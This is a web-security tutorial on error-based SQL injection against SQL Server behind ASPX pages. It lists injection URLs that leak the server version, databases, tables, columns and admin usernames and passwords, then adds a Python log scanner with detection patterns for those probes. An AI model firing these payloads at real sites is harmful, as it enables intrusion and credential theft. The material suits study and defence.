[Original] Web Security, Chapter 4, SQL Injection Part 11: SQL Server Error-Based Injection
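When a statement fails to execute, SQL Server raises an error, and that error is displayed on the web page.
Environment: SQL Server 2008 + ASPX
1. Display system information
and @@version>0 compares the version string with a number, so MSSQL attempts a type conversion; when that conversion fails, the error message displays the system information.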
http://www.demo1.com/index.aspx?id=1 and @@version>0
2. Reveal the current database
http://www.demo1.com/index.aspx?id=-1 and db_name()>0
3. Current user (dbo)
http://www.demo1.com/index.aspx?id=-1 and User_Name()>0
4. Reveal the other databases
http://www.demo1.com/index.aspx?id=-1 and (SELECT top 1 Name FROM Master..SysDatabases)>0
http://www.demo1.com/index.aspx?id=-1 and (SELECT top 1 Name FROM Master..SysDatabases where name not in ('master'))>0
http://www.demo1.com/index.aspx?id=-1 and (SELECT top 1 Name FROM Master..SysDatabases where name not in ('master','iNethinkCMS','model','msdb'))>0
5. Reveal the tables
http://www.demo1.com/index.aspx?id=-1 and (select top 1 name from [mydb].sys.all_objects where type='U' AND is_ms_shipped=0)>0
http://www.demo1.com/index.aspx?id=-1 and (select top 1 name from mydb.sys.all_objects where type='U' AND is_ms_shipped=0 and name not in ('admin'))>0
6. Reveal the columns
http://www.demo1.com/index.aspx?id=1 and (select top 1 COLUMN_NAME from mydb.information_schema.columns where TABLE_NAME='admin' and COLUMN_NAME not in('ID'))>0
http://www.demo1.com/index.aspx?id=1 and (select top 1 COLUMN_NAME from mydb.information_schema.columns where TABLE_NAME='admin' and COLUMN_NAME not in('ID','username'))>0
7. Reveal the data
http://www.demo1.com/index.aspx?id=1 and (select top 1 password from admin)>0
http://www.demo1.com/index.aspx?id=1 and (select top 1 username from admin)>0
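From the defender's side, every request in steps 1 to 7 has the same shape: a string-valued expression compared with a number inside the id parameter. The following is an added example, not part of the original article, that flags that shape in web server logs; the log field order, the sample lines and the function names are constructed assumptions.

```python
import re
from typing import List, Optional, Tuple
from urllib.parse import unquote_plus

# String-valued expressions that the article compares with a number to force a conversion error.
LEAK_SOURCE = r"(?:@@version|db_name\s*\(\s*\)|user_name\s*\(\s*\)|\(\s*select\b.*?\))"
CONVERSION_PROBE = re.compile(LEAK_SOURCE + r"\s*[<>=]+\s*\d+", re.I | re.S)
# Catalog views read by the database, table and column enumeration steps.
METADATA = re.compile(r"sysdatabases|sys\.all_objects|information_schema\.columns", re.I)

def classify(query: str) -> Optional[str]:
    """Label one cs-uri-query value: 'metadata-enum', 'conversion-probe' or None."""
    decoded = unquote_plus(unquote_plus(query))  # undo single and double URL-encoding
    if not CONVERSION_PROBE.search(decoded):
        return None
    return "metadata-enum" if METADATA.search(decoded) else "conversion-probe"

def scan(log_lines: List[str]) -> List[Tuple[str, str, str]]:
    """Return (client_ip, label, status) for every flagged request."""
    hits = []
    for line in log_lines:
        if line.startswith("#"):  # W3C header lines
            continue
        fields = line.split()
        if len(fields) < 7:
            continue
        # Assumed field order: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
        query, client_ip, status = fields[4], fields[5], fields[6]
        label = classify(query)
        if label:
            hits.append((client_ip, label, status))
    return hits

# Constructed sample log (not from the article); spaces in the query are logged as '+'.
SAMPLE_LOG = [
    "#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status",
    "2024-01-01 10:00:00 GET /index.aspx id=1 192.0.2.10 200",
    "2024-01-01 10:00:05 GET /index.aspx id=1+and+@@version>0 192.0.2.44 500",
    "2024-01-01 10:00:09 GET /index.aspx id=-1+and+(SELECT+top+1+Name+FROM+Master..SysDatabases)%3E0 192.0.2.44 500",
    "2024-01-01 10:00:12 GET /index.aspx id=1%2520and%2520db_name()%253E0 192.0.2.44 500",
    "2024-01-01 10:00:20 GET /search.aspx q=price>0&page=2 192.0.2.10 200",
]

if __name__ == "__main__":
    for ip, label, status in scan(SAMPLE_LOG):
        print(ip, label, status)
```

Detection only covers the symptom: the requests stop yielding data once the id value is bound as a typed query parameter and the application returns a generic error page instead of the raw database error.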
Original article by mOon. If you repost it, please credit the source: https://www.moonsec.com/143.html